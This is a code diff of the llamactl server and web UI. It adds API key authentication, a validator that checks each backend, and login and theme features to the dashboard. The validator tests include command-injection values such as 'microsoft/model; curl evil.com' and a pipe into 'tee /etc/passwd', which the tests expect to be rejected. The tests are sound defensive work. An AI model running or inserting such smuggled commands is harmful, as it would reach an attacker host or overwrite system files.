@@ -1,4 +1,4 @@
-package llamactl
+package server

 type OpenAIListInstancesResponse struct {
 	Object string `json:"object"`

@@ -1,4 +1,4 @@
-package llamactl
+package server

 import (
 	"fmt"
@@ -8,7 +8,7 @@ import (
 	"github.com/go-chi/cors"
 	httpSwagger "github.com/swaggo/http-swagger"

-	_ "llamactl/docs"
+	_ "llamactl/apidocs"
 	"llamactl/webui"
 )
@@ -18,7 +18,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
 	// Add CORS middleware
 	r.Use(cors.Handler(cors.Options{
-		AllowedOrigins: handler.config.Server.AllowedOrigins,
+		AllowedOrigins: handler.cfg.Server.AllowedOrigins,
 		AllowedMethods: []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
 		AllowedHeaders: []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
 		ExposedHeaders: []string{"Link"},
@@ -26,16 +26,28 @@ func SetupRouter(handler *Handler) *chi.Mux {
 		MaxAge: 300,
 	}))

-	r.Get("/swagger/*", httpSwagger.Handler(
-		httpSwagger.URL("/swagger/doc.json"),
-	))
+	// Add API authentication middleware
+	authMiddleware := NewAPIAuthMiddleware(handler.cfg.Auth)
+
+	if handler.cfg.Server.EnableSwagger {
+		r.Get("/swagger/*", httpSwagger.Handler(
+			httpSwagger.URL("/swagger/doc.json"),
+		))
+	}

 	// Define routes
 	r.Route("/api/v1", func(r chi.Router) {
+		if authMiddleware != nil && handler.cfg.Auth.RequireManagementAuth {
+			r.Use(authMiddleware.AuthMiddleware(KeyTypeManagement))
+		}
+
+		r.Get("/version", handler.VersionHandler()) // Get server version
+
 		r.Route("/server", func(r chi.Router) {
-			r.Get("/help", handler.HelpHandler())
-			r.Get("/version", handler.VersionHandler())
-			r.Get("/devices", handler.ListDevicesHandler())
+			r.Get("/help", handler.LlamaServerHelpHandler())
+			r.Get("/version", handler.LlamaServerVersionHandler())
+			r.Get("/devices", handler.LlamaServerListDevicesHandler())
 		})

 		// Instance management endpoints
@@ -61,17 +73,25 @@ func SetupRouter(handler *Handler) *chi.Mux {
 		})
 	})

-	r.Get(("/v1/models"), handler.OpenAIListInstances()) // List instances in OpenAI-compatible format
-
-	// OpenAI-compatible proxy endpoint
-	// Handles all POST requests to /v1/*, including:
-	// - /v1/completions
-	// - /v1/chat/completions
-	// - /v1/embeddings
-	// - /v1/rerank
-	// - /v1/reranking
-	// The instance/model to use is determined by the request body.
-	r.Post("/v1/*", handler.OpenAIProxy())
+	r.Route(("/v1"), func(r chi.Router) {
+		if authMiddleware != nil && handler.cfg.Auth.RequireInferenceAuth {
+			r.Use(authMiddleware.AuthMiddleware(KeyTypeInference))
+		}
+
+		r.Get(("/models"), handler.OpenAIListInstances()) // List instances in OpenAI-compatible format
+
+		// OpenAI-compatible proxy endpoint
+		// Handles all POST requests to /v1/*, including:
+		// - /v1/completions
+		// - /v1/chat/completions
+		// - /v1/embeddings
+		// - /v1/rerank
+		// - /v1/reranking
+		// The instance/model to use is determined by the request body.
+		r.Post("/*", handler.OpenAIProxy())
+	})

 	// Serve WebUI files
 	if err := webui.SetupWebUI(r); err != nil {
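The net effect of this wiring is a privilege split: management keys guard /api/v1/* and, because the middleware also accepts them for inference, pass on /v1/* too, while inference keys are only valid under /v1/*. A hypothetical probe against a running server (address and keys assumed, with both auth requirements enabled):

package main

import (
	"fmt"
	"net/http"
)

// probe sends a GET with the given key and prints the status code.
func probe(url, key string) {
	req, _ := http.NewRequest("GET", url, nil)
	req.Header.Set("Authorization", "Bearer "+key)
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		fmt.Println(err)
		return
	}
	resp.Body.Close()
	fmt.Println(url, "->", resp.StatusCode)
}

func main() {
	inferenceKey := "sk-inference-example"   // assumed to be configured
	managementKey := "sk-management-example" // assumed to be configured

	probe("http://localhost:8080/v1/models", inferenceKey)         // 200
	probe("http://localhost:8080/api/v1/instances", inferenceKey)  // 401: inference keys are not management keys
	probe("http://localhost:8080/api/v1/instances", managementKey) // 200
	probe("http://localhost:8080/v1/models", managementKey)        // 200: management keys are accepted for inference
}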

pkg/testutil/helpers.go

@@ -0,0 +1,10 @@
package testutil
// Helper functions for pointer fields
func BoolPtr(b bool) *bool {
return &b
}
func IntPtr(i int) *int {
return &i
}
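These helpers exist because Go has no address-of-literal syntax: `&true` and `&5` do not compile, so optional pointer fields need a temporary. A small usage sketch (the field names come from the instance options shown in the tests below):

package example

import (
	"llamactl/pkg/instance"
	"llamactl/pkg/testutil"
)

func newOptions() *instance.CreateInstanceOptions {
	return &instance.CreateInstanceOptions{
		AutoRestart: testutil.BoolPtr(true), // instead of the invalid &true
		MaxRestarts: testutil.IntPtr(5),     // instead of the invalid &5
	}
}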

@@ -1,7 +1,9 @@
-package llamactl
+package validation

 import (
 	"fmt"
+	"llamactl/pkg/backends"
+	"llamactl/pkg/instance"
 	"reflect"
 	"regexp"
 )
@@ -32,20 +34,35 @@ func validateStringForInjection(value string) error {
 	return nil
 }

-// ValidateInstanceOptions performs minimal security validation
-func ValidateInstanceOptions(options *CreateInstanceOptions) error {
+// ValidateInstanceOptions performs validation based on backend type
+func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
 	if options == nil {
 		return ValidationError(fmt.Errorf("options cannot be nil"))
 	}

+	// Validate based on backend type
+	switch options.BackendType {
+	case backends.BackendTypeLlamaCpp:
+		return validateLlamaCppOptions(options)
+	default:
+		return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
+	}
+}
+
+// validateLlamaCppOptions validates llama.cpp specific options
+func validateLlamaCppOptions(options *instance.CreateInstanceOptions) error {
+	if options.LlamaServerOptions == nil {
+		return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
+	}
+
 	// Use reflection to check all string fields for injection patterns
-	if err := validateStructStrings(&options.LlamaServerOptions, ""); err != nil {
+	if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
 		return err
 	}

-	// Basic network validation - only check for reasonable ranges
-	if options.Port < 0 || options.Port > 65535 {
-		return ValidationError(fmt.Errorf("invalid port range"))
+	// Basic network validation for port
+	if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
+		return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
 	}

 	return nil
@@ -101,16 +118,16 @@ func validateStructStrings(v any, fieldPath string) error {
 	return nil
 }

-func ValidateInstanceName(name string) error {
+func ValidateInstanceName(name string) (string, error) {
 	// Validate instance name
 	if name == "" {
-		return ValidationError(fmt.Errorf("name cannot be empty"))
+		return "", ValidationError(fmt.Errorf("name cannot be empty"))
 	}
 	if !validNamePattern.MatchString(name) {
-		return ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
+		return "", ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
	}
 	if len(name) > 50 {
-		return ValidationError(fmt.Errorf("name too long (max 50 characters)"))
+		return "", ValidationError(fmt.Errorf("name too long (max 50 characters)"))
 	}

-	return nil
+	return name, nil
 }
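With the new signature, callers receive the validated name back instead of reusing the raw input. A caller sketch under that assumption (the create function is illustrative, not part of this commit):

package example

import (
	"fmt"

	"llamactl/pkg/validation"
)

func create(rawName string) error {
	name, err := validation.ValidateInstanceName(rawName)
	if err != nil {
		return fmt.Errorf("invalid instance name: %w", err)
	}
	// From here on, use the returned value rather than the raw input.
	fmt.Printf("creating instance %q\n", name)
	return nil
}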

@@ -1,10 +1,13 @@
-package llamactl_test
+package validation_test

 import (
+	"llamactl/pkg/backends"
+	"llamactl/pkg/backends/llamacpp"
+	"llamactl/pkg/instance"
+	"llamactl/pkg/testutil"
+	"llamactl/pkg/validation"
 	"strings"
 	"testing"
-
-	llamactl "llamactl/pkg"
 )

 func TestValidateInstanceName(t *testing.T) {
@@ -39,16 +42,23 @@ func TestValidateInstanceName(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			err := llamactl.ValidateInstanceName(tt.input)
+			name, err := validation.ValidateInstanceName(tt.input)
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceName(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
 			}
+			if tt.wantErr {
+				return // Skip further checks if we expect an error
+			}
+			// If no error, check that the name is returned as expected
+			if name != tt.input {
+				t.Errorf("ValidateInstanceName(%q) = %q, want %q", tt.input, name, tt.input)
+			}
 		})
 	}
 }

 func TestValidateInstanceOptions_NilOptions(t *testing.T) {
-	err := llamactl.ValidateInstanceOptions(nil)
+	err := validation.ValidateInstanceOptions(nil)
 	if err == nil {
 		t.Error("Expected error for nil options")
 	}
@@ -73,13 +83,14 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			options := &llamactl.CreateInstanceOptions{
-				LlamaServerOptions: llamactl.LlamaServerOptions{
+			options := &instance.CreateInstanceOptions{
+				BackendType: backends.BackendTypeLlamaCpp,
+				LlamaServerOptions: &llamacpp.LlamaServerOptions{
 					Port: tt.port,
 				},
 			}

-			err := llamactl.ValidateInstanceOptions(options)
+			err := validation.ValidateInstanceOptions(options)
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
 			}
@@ -126,13 +137,14 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Test with Model field (string field)
-			options := &llamactl.CreateInstanceOptions{
-				LlamaServerOptions: llamactl.LlamaServerOptions{
+			options := &instance.CreateInstanceOptions{
+				BackendType: backends.BackendTypeLlamaCpp,
+				LlamaServerOptions: &llamacpp.LlamaServerOptions{
 					Model: tt.value,
 				},
 			}

-			err := llamactl.ValidateInstanceOptions(options)
+			err := validation.ValidateInstanceOptions(options)
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
 			}
@@ -163,13 +175,14 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Test with Lora field (array field)
-			options := &llamactl.CreateInstanceOptions{
-				LlamaServerOptions: llamactl.LlamaServerOptions{
+			options := &instance.CreateInstanceOptions{
+				BackendType: backends.BackendTypeLlamaCpp,
+				LlamaServerOptions: &llamacpp.LlamaServerOptions{
 					Lora: tt.array,
 				},
 			}

-			err := llamactl.ValidateInstanceOptions(options)
+			err := validation.ValidateInstanceOptions(options)
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
 			}
@@ -181,13 +194,14 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 	// Test that injection in any field is caught
 	tests := []struct {
 		name    string
-		options *llamactl.CreateInstanceOptions
+		options *instance.CreateInstanceOptions
 		wantErr bool
 	}{
 		{
 			name: "injection in model field",
-			options: &llamactl.CreateInstanceOptions{
-				LlamaServerOptions: llamactl.LlamaServerOptions{
+			options: &instance.CreateInstanceOptions{
+				BackendType: backends.BackendTypeLlamaCpp,
+				LlamaServerOptions: &llamacpp.LlamaServerOptions{
 					Model:  "safe.gguf",
 					HFRepo: "microsoft/model; curl evil.com",
 				},
@@ -196,8 +210,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 		},
 		{
 			name: "injection in log file",
-			options: &llamactl.CreateInstanceOptions{
-				LlamaServerOptions: llamactl.LlamaServerOptions{
+			options: &instance.CreateInstanceOptions{
+				BackendType: backends.BackendTypeLlamaCpp,
+				LlamaServerOptions: &llamacpp.LlamaServerOptions{
 					Model:   "safe.gguf",
 					LogFile: "/tmp/log.txt | tee /etc/passwd",
 				},
@@ -206,8 +221,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 		},
 		{
 			name: "all safe fields",
-			options: &llamactl.CreateInstanceOptions{
-				LlamaServerOptions: llamactl.LlamaServerOptions{
+			options: &instance.CreateInstanceOptions{
+				BackendType: backends.BackendTypeLlamaCpp,
+				LlamaServerOptions: &llamacpp.LlamaServerOptions{
 					Model:   "/path/to/model.gguf",
 					HFRepo:  "microsoft/DialoGPT-medium",
 					LogFile: "/tmp/llama.log",
@@ -221,7 +237,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			err := llamactl.ValidateInstanceOptions(tt.options)
+			err := validation.ValidateInstanceOptions(tt.options)
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
 			}
@@ -231,11 +247,12 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
 	// Test that non-string fields don't interfere with validation
-	options := &llamactl.CreateInstanceOptions{
-		AutoRestart:  boolPtr(true),
-		MaxRestarts:  intPtr(5),
-		RestartDelay: intPtr(10),
-		LlamaServerOptions: llamactl.LlamaServerOptions{
+	options := &instance.CreateInstanceOptions{
+		AutoRestart:  testutil.BoolPtr(true),
+		MaxRestarts:  testutil.IntPtr(5),
+		RestartDelay: testutil.IntPtr(10),
+		BackendType:  backends.BackendTypeLlamaCpp,
+		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Port:      8080,
 			GPULayers: 32,
 			CtxSize:   4096,
@@ -247,17 +264,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
 		},
 	}

-	err := llamactl.ValidateInstanceOptions(options)
+	err := validation.ValidateInstanceOptions(options)
 	if err != nil {
 		t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
 	}
 }
-
-// Helper functions for pointer fields
-func boolPtr(b bool) *bool {
-	return &b
-}
-
-func intPtr(i int) *int {
-	return &i
-}

@@ -1,12 +1,16 @@
 import { useState } from "react";
 import Header from "@/components/Header";
 import InstanceList from "@/components/InstanceList";
-import InstanceModal from "@/components/InstanceModal";
+import InstanceDialog from "@/components/InstanceDialog";
+import LoginDialog from "@/components/LoginDialog";
+import SystemInfoDialog from "./components/SystemInfoDialog";
 import { type CreateInstanceOptions, type Instance } from "@/types/instance";
 import { useInstances } from "@/contexts/InstancesContext";
-import SystemInfoModal from "./components/SystemInfoModal";
+import { useAuth } from "@/contexts/AuthContext";
+import { ThemeProvider } from "@/contexts/ThemeContext";

 function App() {
+  const { isAuthenticated, isLoading: authLoading } = useAuth();
   const [isInstanceModalOpen, setIsInstanceModalOpen] = useState(false);
   const [isSystemInfoModalOpen, setIsSystemInfoModalOpen] = useState(false);
   const [editingInstance, setEditingInstance] = useState<Instance | undefined>(
@@ -26,9 +30,9 @@ function App() {
   const handleSaveInstance = (name: string, options: CreateInstanceOptions) => {
     if (editingInstance) {
-      updateInstance(editingInstance.name, options);
+      void updateInstance(editingInstance.name, options);
     } else {
-      createInstance(name, options);
+      void createInstance(name, options);
     }
   };
@@ -36,26 +40,54 @@ function App() {
     setIsSystemInfoModalOpen(true);
   };

+  // Show loading spinner while checking auth
+  if (authLoading) {
+    return (
+      <ThemeProvider>
+        <div className="min-h-screen bg-background flex items-center justify-center">
+          <div className="text-center">
+            <div className="animate-spin rounded-full h-8 w-8 border-b-2 border-primary mx-auto mb-4"></div>
+            <p className="text-muted-foreground">Loading...</p>
+          </div>
+        </div>
+      </ThemeProvider>
+    );
+  }
+
+  // Show login dialog if not authenticated
+  if (!isAuthenticated) {
+    return (
+      <ThemeProvider>
+        <div className="min-h-screen bg-background">
+          <LoginDialog open={true} />
+        </div>
+      </ThemeProvider>
+    );
+  }
+
+  // Show main app if authenticated
   return (
-    <div className="min-h-screen bg-gray-50">
-      <Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} />
-      <main className="container mx-auto max-w-4xl px-4 py-8">
-        <InstanceList editInstance={handleEditInstance} />
-      </main>
-
-      <InstanceModal
-        open={isInstanceModalOpen}
-        onOpenChange={setIsInstanceModalOpen}
-        onSave={handleSaveInstance}
-        instance={editingInstance}
-      />
-      <SystemInfoModal
-        open={isSystemInfoModalOpen}
-        onOpenChange={setIsSystemInfoModalOpen}
-      />
-    </div>
+    <ThemeProvider>
+      <div className="min-h-screen bg-background">
+        <Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} />
+        <main className="container mx-auto max-w-4xl px-4 py-8">
+          <InstanceList editInstance={handleEditInstance} />
+        </main>
+
+        <InstanceDialog
+          open={isInstanceModalOpen}
+          onOpenChange={setIsInstanceModalOpen}
+          onSave={handleSaveInstance}
+          instance={editingInstance}
+        />
+        <SystemInfoDialog
+          open={isSystemInfoModalOpen}
+          onOpenChange={setIsSystemInfoModalOpen}
+        />
+      </div>
+    </ThemeProvider>
   );
 }

 export default App;

@@ -1,10 +1,12 @@
-import { describe, it, expect, vi, beforeEach } from 'vitest'
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
 import { render, screen, waitFor } from '@testing-library/react'
 import userEvent from '@testing-library/user-event'
 import App from '@/App'
 import { InstancesProvider } from '@/contexts/InstancesContext'
 import { instancesApi } from '@/lib/api'
 import type { Instance } from '@/types/instance'
+import { BackendType } from '@/types/instance'
+import { AuthProvider } from '@/contexts/AuthContext'

 // Mock the API
 vi.mock('@/lib/api', () => ({
@@ -35,21 +37,44 @@ vi.mock('@/lib/healthService', () => ({
 function renderApp() {
   return render(
-    <InstancesProvider>
-      <App />
-    </InstancesProvider>
+    <AuthProvider>
+      <InstancesProvider>
+        <App />
+      </InstancesProvider>
+    </AuthProvider>
   )
 }

 describe('App Component - Critical Business Logic Only', () => {
   const mockInstances: Instance[] = [
-    { name: 'test-instance-1', running: false, options: { model: 'model1.gguf' } },
-    { name: 'test-instance-2', running: true, options: { model: 'model2.gguf' } }
+    { name: 'test-instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
+    { name: 'test-instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } }
   ]

   beforeEach(() => {
     vi.clearAllMocks()
     vi.mocked(instancesApi.list).mockResolvedValue(mockInstances)
+    window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
+    global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
+
+    // Mock window.matchMedia for dark mode functionality
+    Object.defineProperty(window, 'matchMedia', {
+      writable: true,
+      value: vi.fn().mockImplementation((query: string) => ({
+        matches: false,
+        media: query,
+        onchange: null,
+        addListener: vi.fn(),
+        removeListener: vi.fn(),
+        addEventListener: vi.fn(),
+        removeEventListener: vi.fn(),
+        dispatchEvent: vi.fn(),
+      })),
+    })
+  })
+
+  afterEach(() => {
+    vi.restoreAllMocks()
   })

   describe('End-to-End Instance Management', () => {
@@ -57,8 +82,8 @@ describe('App Component - Critical Business Logic Only', () => {
       const user = userEvent.setup()
       const newInstance: Instance = {
         name: 'new-test-instance',
-        running: false,
-        options: { model: 'new-model.gguf' }
+        status: 'stopped',
+        options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'new-model.gguf' } }
       }
       vi.mocked(instancesApi.create).mockResolvedValue(newInstance)
@@ -75,12 +100,13 @@ describe('App Component - Critical Business Logic Only', () => {
       const nameInput = screen.getByLabelText(/Instance Name/)
       await user.type(nameInput, 'new-test-instance')

-      await user.click(screen.getByTestId('modal-save-button'))
+      await user.click(screen.getByTestId('dialog-save-button'))

       // Verify correct API call
       await waitFor(() => {
         expect(instancesApi.create).toHaveBeenCalledWith('new-test-instance', {
           auto_restart: true, // Default value
+          backend_type: BackendType.LLAMA_CPP
         })
       })
@@ -94,8 +120,8 @@ describe('App Component - Critical Business Logic Only', () => {
       const user = userEvent.setup()
       const updatedInstance: Instance = {
         name: 'test-instance-1',
-        running: false,
-        options: { model: 'updated-model.gguf' }
+        status: 'stopped',
+        options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'updated-model.gguf' } }
       }
       vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance)
@@ -109,12 +135,13 @@ describe('App Component - Critical Business Logic Only', () => {
       const editButtons = screen.getAllByTitle('Edit instance')
       await user.click(editButtons[0])

-      await user.click(screen.getByTestId('modal-save-button'))
+      await user.click(screen.getByTestId('dialog-save-button'))

       // Verify correct API call with existing instance data
       await waitFor(() => {
         expect(instancesApi.update).toHaveBeenCalledWith('test-instance-1', {
-          model: "model1.gguf", // Pre-filled from existing instance
+          backend_type: BackendType.LLAMA_CPP,
+          backend_options: { model: "model1.gguf" } // Pre-filled from existing instance
         })
       })
     })
@@ -167,7 +194,6 @@ describe('App Component - Critical Business Logic Only', () => {
       renderApp()

       // App should still render and show error
-      expect(screen.getByText('Llamactl Dashboard')).toBeInTheDocument()
       await waitFor(() => {
         expect(screen.getByText('Error loading instances')).toBeInTheDocument()
       })


@@ -0,0 +1,123 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import { Checkbox } from '@/components/ui/checkbox'
import type { BackendOptions } from '@/schemas/instanceOptions'
import { getBackendFieldType, basicBackendFieldsConfig } from '@/lib/zodFormUtils'
interface BackendFormFieldProps {
fieldKey: keyof BackendOptions
value: string | number | boolean | string[] | undefined
onChange: (key: string, value: string | number | boolean | string[] | undefined) => void
}
const BackendFormField: React.FC<BackendFormFieldProps> = ({ fieldKey, value, onChange }) => {
// Get configuration for basic fields, or use field name for advanced fields
const config = basicBackendFieldsConfig[fieldKey as string] || { label: fieldKey }
// Get type from Zod schema
const fieldType = getBackendFieldType(fieldKey)
const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
onChange(fieldKey as string, newValue)
}
const renderField = () => {
switch (fieldType) {
case 'boolean':
return (
<div className="flex items-center space-x-2">
<Checkbox
id={fieldKey}
checked={typeof value === 'boolean' ? value : false}
onCheckedChange={(checked) => handleChange(checked)}
/>
<Label htmlFor={fieldKey} className="text-sm font-normal">
{config.label}
{config.description && (
<span className="text-muted-foreground ml-1">- {config.description}</span>
)}
</Label>
</div>
)
case 'number':
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="number"
step="any" // This allows decimal numbers
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => {
const numValue = e.target.value ? parseFloat(e.target.value) : undefined
// Only update if the parsed value is valid or the input is empty
if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
handleChange(numValue)
}
}}
placeholder={config.placeholder}
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
</div>
)
case 'array':
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="text"
value={Array.isArray(value) ? value.join(', ') : ''}
onChange={(e) => {
const arrayValue = e.target.value
? e.target.value.split(',').map(s => s.trim()).filter(Boolean)
: undefined
handleChange(arrayValue)
}}
placeholder="item1, item2, item3"
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
<p className="text-xs text-muted-foreground">Separate multiple values with commas</p>
</div>
)
case 'text':
default:
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="text"
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => handleChange(e.target.value || undefined)}
placeholder={config.placeholder}
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
</div>
)
}
}
return <div className="space-y-2">{renderField()}</div>
}
export default BackendFormField

@@ -1,5 +1,7 @@
 import { Button } from "@/components/ui/button";
-import { HelpCircle } from "lucide-react";
+import { HelpCircle, LogOut, Moon, Sun } from "lucide-react";
+import { useAuth } from "@/contexts/AuthContext";
+import { useTheme } from "@/contexts/ThemeContext";

 interface HeaderProps {
   onCreateInstance: () => void;
@@ -7,16 +9,37 @@ interface HeaderProps {
 }

 function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
+  const { logout } = useAuth();
+  const { theme, toggleTheme } = useTheme();
+
+  const handleLogout = () => {
+    if (confirm("Are you sure you want to logout?")) {
+      logout();
+    }
+  };
+
   return (
-    <header className="bg-white border-b border-gray-200">
+    <header className="bg-card border-b border-border">
       <div className="container mx-auto max-w-4xl px-4 py-4">
         <div className="flex items-center justify-between">
-          <h1 className="text-2xl font-bold text-gray-900">
+          <h1 className="text-2xl font-bold text-foreground">
             Llamactl Dashboard
           </h1>

           <div className="flex items-center gap-2">
-            <Button onClick={onCreateInstance} data-testid="create-instance-button">Create Instance</Button>
+            <Button onClick={onCreateInstance} data-testid="create-instance-button">
+              Create Instance
+            </Button>
+
+            <Button
+              variant="outline"
+              size="icon"
+              onClick={toggleTheme}
+              data-testid="theme-toggle-button"
+              title={`Switch to ${theme === 'light' ? 'dark' : 'light'} mode`}
+            >
+              {theme === 'light' ? <Moon className="h-4 w-4" /> : <Sun className="h-4 w-4" />}
+            </Button>

             <Button
               variant="outline"
@@ -27,6 +50,16 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
             >
               <HelpCircle className="h-4 w-4" />
             </Button>
+
+            <Button
+              variant="outline"
+              size="icon"
+              onClick={handleLogout}
+              data-testid="logout-button"
+              title="Logout"
+            >
+              <LogOut className="h-4 w-4" />
+            </Button>
           </div>
         </div>
       </div>
@@ -34,4 +67,4 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
   );
 }

 export default Header;

@@ -27,6 +27,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
         return <XCircle className="h-3 w-3" />;
       case "unknown":
         return <Loader2 className="h-3 w-3 animate-spin" />;
+      case "failed":
+        return <XCircle className="h-3 w-3" />;
     }
   };
@@ -40,6 +42,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
         return "destructive";
       case "unknown":
         return "secondary";
+      case "failed":
+        return "destructive";
     }
   };
@@ -53,6 +57,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
         return "Error";
       case "unknown":
         return "Unknown";
+      case "failed":
+        return "Failed";
     }
   };

@@ -3,7 +3,7 @@ import { Button } from "@/components/ui/button";
 import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
 import type { Instance } from "@/types/instance";
 import { Edit, FileText, Play, Square, Trash2 } from "lucide-react";
-import LogsModal from "@/components/LogModal";
+import LogsDialog from "@/components/LogDialog";
 import HealthBadge from "@/components/HealthBadge";
 import { useState } from "react";
 import { useInstanceHealth } from "@/hooks/useInstanceHealth";
@@ -24,7 +24,7 @@ function InstanceCard({
   editInstance,
 }: InstanceCardProps) {
   const [isLogsOpen, setIsLogsOpen] = useState(false);
-  const health = useInstanceHealth(instance.name, instance.running);
+  const health = useInstanceHealth(instance.name, instance.status);

   const handleStart = () => {
     startInstance(instance.name);
@@ -50,13 +50,15 @@ function InstanceCard({
     setIsLogsOpen(true);
   };

+  const running = instance.status === "running";
+
   return (
     <>
       <Card>
         <CardHeader className="pb-3">
           <div className="flex items-center justify-between">
             <CardTitle className="text-lg">{instance.name}</CardTitle>
-            {instance.running && <HealthBadge health={health} />}
+            {running && <HealthBadge health={health} />}
           </div>
         </CardHeader>
@@ -66,7 +68,7 @@ function InstanceCard({
             size="sm"
             variant="outline"
             onClick={handleStart}
-            disabled={instance.running}
+            disabled={running}
             title="Start instance"
             data-testid="start-instance-button"
           >
@@ -77,7 +79,7 @@ function InstanceCard({
             size="sm"
             variant="outline"
             onClick={handleStop}
-            disabled={!instance.running}
+            disabled={!running}
             title="Stop instance"
             data-testid="stop-instance-button"
           >
@@ -108,7 +110,7 @@ function InstanceCard({
             size="sm"
             variant="destructive"
             onClick={handleDelete}
-            disabled={instance.running}
+            disabled={running}
             title="Delete instance"
             data-testid="delete-instance-button"
           >
@@ -118,11 +120,11 @@ function InstanceCard({
         </CardContent>
       </Card>

-      <LogsModal
+      <LogsDialog
         open={isLogsOpen}
         onOpenChange={setIsLogsOpen}
         instanceName={instance.name}
-        isRunning={instance.running}
+        isRunning={running}
       />
     </>
   );

@@ -10,26 +10,26 @@ import {
   DialogHeader,
   DialogTitle,
 } from "@/components/ui/dialog";
-import type { CreateInstanceOptions, Instance } from "@/types/instance";
+import { BackendType, type CreateInstanceOptions, type Instance } from "@/types/instance";
-import { getBasicFields, getAdvancedFields } from "@/lib/zodFormUtils";
+import { getBasicFields, getAdvancedFields, getBasicBackendFields, getAdvancedBackendFields } from "@/lib/zodFormUtils";
 import { ChevronDown, ChevronRight } from "lucide-react";
 import ZodFormField from "@/components/ZodFormField";
+import BackendFormField from "@/components/BackendFormField";

-interface InstanceModalProps {
+interface InstanceDialogProps {
   open: boolean;
   onOpenChange: (open: boolean) => void;
   onSave: (name: string, options: CreateInstanceOptions) => void;
   instance?: Instance; // For editing existing instance
 }

-const InstanceModal: React.FC<InstanceModalProps> = ({
+const InstanceDialog: React.FC<InstanceDialogProps> = ({
   open,
   onOpenChange,
   onSave,
   instance,
 }) => {
   const isEditing = !!instance;
-  const isRunning = instance?.running || true; // Assume running if instance exists

   const [instanceName, setInstanceName] = useState("");
   const [formData, setFormData] = useState<CreateInstanceOptions>({});
@@ -39,8 +39,10 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
   // Get field lists dynamically from the type
   const basicFields = getBasicFields();
